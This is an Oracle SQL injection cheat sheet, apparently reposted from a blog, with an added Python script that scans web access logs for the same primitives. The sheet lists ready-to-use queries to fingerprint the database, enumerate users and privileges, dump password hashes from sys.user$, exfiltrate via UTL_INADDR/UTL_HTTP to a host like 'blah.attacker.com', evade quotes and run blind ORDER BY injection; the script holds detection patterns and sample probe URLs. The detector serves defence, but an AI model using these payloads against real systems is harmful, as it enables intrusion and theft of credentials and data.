• Oracle Injection Cheat Sheet


    Note: some of the queries below can only be run by an admin; these are marked with "-priv" at the end of the query.

    Version detection:

    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;
    

    Comments:

    SELECT 1 FROM dual -- comment
    

    Note: Oracle SELECT statements must include a FROM clause, so when we are not actually querying a table we have to use the dummy table 'dual'.

    Current user:

    SELECT user FROM dual
    

    List all users:

    SELECT username FROM all_users ORDER BY username;
    SELECT name FROM sys.user$; -- priv
    

    List password hashes:

    SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g.  astatus tells you whether the account is locked
    SELECT name,spare4 FROM sys.user$ -- priv, 11g
    

    Password cracking:

    checkpwd can crack the DES-based hashes used by Oracle 8, 9 and 10

    List privileges:

    SELECT * FROM session_privs; -- privileges of the current user
    SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list the privileges of a given user
    SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users who hold a given privilege
    SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
    

    List DBA accounts:

    SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs and their privileges
    

    Current database:

    SELECT global_name FROM global_name;
    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance;
    SELECT SYS.DATABASE_NAME FROM DUAL;
    

    List databases:

    SELECT DISTINCT owner FROM all_tables; -- list databases (one per user)


    -- Other databases can be discovered by querying the TNS listener; see tnscmd for details.

    List column names:

    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
    

    List table names:

    SELECT table_name FROM all_tables;
    SELECT owner, table_name FROM all_tables;
    

    Find a table from a column name:

    SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';


    -- Note: table names are upper case

    Select the Nth row:

    SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- select the 9th row (counting from 1)
    

    Select the Nth character:

    SELECT substr('abcd', 3, 1) FROM dual; -- returns the third character, 'c'
    

    Bitwise AND:

    SELECT bitand(6,2) FROM dual; -- returns 2
    SELECT bitand(6,1) FROM dual; -- returns 0
    

    ASCII value to character:

    SELECT chr(65) FROM dual; -- returns A
    

    Character to ASCII value:

    SELECT ascii('A') FROM dual; -- returns 65
    

    Casting:

    SELECT CAST(1 AS char) FROM dual;
    SELECT CAST('1' AS int) FROM dual;
    

    String concatenation:

    SELECT 'A' || 'B' FROM dual; -- returns AB
    

    IF statement:

    BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;


    -- does not work well together with a SELECT statement

    CASE statement:

    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
    SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
    

    Avoiding quotes:

    SELECT chr(65) || chr(66) FROM dual; -- returns AB
    

    Time delay:

    BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, cannot be used inside a SELECT
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
    SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
    SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered or slow


    -- See Heavy Queries for more on time delays

    Make DNS requests:

    SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
    SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
    

    Command execution:

    Java can be used to execute commands if it is installed on the target; see here.

    ExtProc can sometimes be used too, though I have not generally had success with it; see here.

    Local file access:

    UTL_FILE can sometimes be used. Check that the following query does not return null.

    SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';


    Java can be used to read and write files, except on Oracle Express.

    Hostname, IP address:

    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT host_name FROM v$instance;
    SELECT UTL_INADDR.get_host_address FROM dual; -- get IP address
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- get hostname
    

    Location of DB files:

    SELECT name FROM V$DATAFILE;
    

    Default/system databases:

    SYSTEM
    SYSAUX
    

    Extra tips:

    List all table names in a single string:

    select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables


    -- useful when your UNION-based injection only has one row available for returning data

    Blind ordering:

    order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end


    -- you need to know the names of two columns with the same data type for this to work
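    From the defender's side, the Oracle-specific objects and functions this sheet relies on (v$version, sys.user$, the dba_* views, UTL_INADDR/UTL_HTTP, DBMS_LOCK.SLEEP, xmlagg, chr()||chr() quote evasion, ORDER BY CASE WHEN) are also what stands out in a web server's access log when someone tries them through a URL parameter. The script below is an added example, not part of the original cheat sheet: it URL-decodes the request line of each log entry and labels it with whichever of those primitives it contains. The log format (Apache-style combined log), the label names, and the sample log lines are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicators derived from the primitives listed in this cheat sheet.
# The label names are our own (an assumption for this example); each
# pattern matches the Oracle object or function the sheet uses.
INDICATORS = {
    "fingerprint":   re.compile(r"v\$(?:version|instance|database)", re.I),
    "hash_dump":     re.compile(r"sys\.user\$", re.I),
    "priv_enum":     re.compile(r"\b(?:dba_sys_privs|dba_role_privs|session_privs)\b", re.I),
    "schema_enum":   re.compile(r"\b(?:all_users|all_tables|all_tab_columns)\b", re.I),
    "oob_channel":   re.compile(r"\butl_(?:inaddr|http)\.", re.I),
    "time_delay":    re.compile(r"\bdbms_lock\.sleep\b", re.I),
    "xml_aggregate": re.compile(r"\bxmlagg\s*\(", re.I),
    "quote_evasion": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "blind_orderby": re.compile(r"\border\s+by\s+case\s+when\b", re.I),
}

# Pulls the request target out of an Apache-style combined log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT)\s+(\S+)')


def classify(request_target: str) -> list[str]:
    """Return the indicator labels found in a (URL-encoded) request target."""
    decoded = unquote_plus(request_target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Return (1-based line number, labels) for every line with at least one hit."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        labels = classify(m.group(1))
        if labels:
            hits.append((lineno, labels))
    return hits


# Constructed sample access log: one benign request, several probes that
# mirror the queries in this sheet, and one unrelated POST.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jan/2022:10:00:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Jan/2022:10:00:02 +0000] "GET /item?id=42%20UNION%20SELECT%20banner%20FROM%20v%24version%20WHERE%20banner%20LIKE%20%27Oracle%25%27-- HTTP/1.1" 200 640',
    '10.0.0.5 - - [11/Jan/2022:10:00:03 +0000] "GET /item?id=42%20UNION%20SELECT%20name%2Cspare4%20FROM%20sys.user%24-- HTTP/1.1" 500 311',
    '10.0.0.5 - - [11/Jan/2022:10:00:04 +0000] "GET /item?id=42%20AND%20UTL_INADDR.get_host_address(%27x.example.invalid%27)%3D1-- HTTP/1.1" 500 311',
    '10.0.0.5 - - [11/Jan/2022:10:00:05 +0000] "GET /search?q=a%27%20||%20chr(65)||chr(66)-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Jan/2022:10:00:06 +0000] "GET /list?sort=order%20by%20case%20when%20((select%201%20from%20user_tables%20where%20rownum%3D1)%3D1)%20then%20name%20else%20price%20end HTTP/1.1" 200 2048',
    '10.0.0.6 - - [11/Jan/2022:10:00:07 +0000] "POST /login HTTP/1.1" 302 0',
]


def main() -> None:
    for lineno, labels in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(labels)}")


if __name__ == "__main__":
    main()
```

    Feeding a real access log into scan_log gives a per-request label list that is easy to turn into an alert or a WAF rule test; decoding before matching matters, because the `$` in `v$version` and the quotes around string literals almost always arrive percent-encoded.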

  • Original source: https://www.cnblogs.com/songanwei/p/9153965.html